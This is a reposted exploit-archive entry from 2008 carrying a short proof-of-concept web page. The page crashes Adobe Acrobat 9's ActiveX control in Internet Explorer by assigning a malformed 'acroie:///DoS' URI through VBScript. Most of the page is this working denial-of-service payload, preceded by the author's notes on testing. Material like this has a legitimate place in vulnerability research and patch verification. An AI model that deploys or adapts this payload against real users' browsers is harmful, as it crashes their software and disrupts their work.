Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit
# Published : 2008-09-11
# Author : Jeremy Brown
# Previous Title : Nokia e90/n82 (s60v3) Remote Denial of Service Vulnerability
# Next Title : Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

<!-- Jeremy Brown (0xjbrown41@gmail.com/jbrownsec.blogspot.com)
     Adobe Acrobat 9 Remote DoS (--) Tested on AA9/IE7/Vista
     I can't seem to reproduce this on XP! Oh well.
     Of course the most popular app for reading pdfs is SfS/SfI :)
     Basically it will crash with any uri that adobe doesn't like.
     Also interesting: try with file:///DoS and look in bottom left area -->

<html><body>

<object id=target classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></object>
<script language=vbscript>

arg1="acroie:///DoS"
target.src = arg1

</script>
</body></html>

# www.Syue.com [2008-09-11]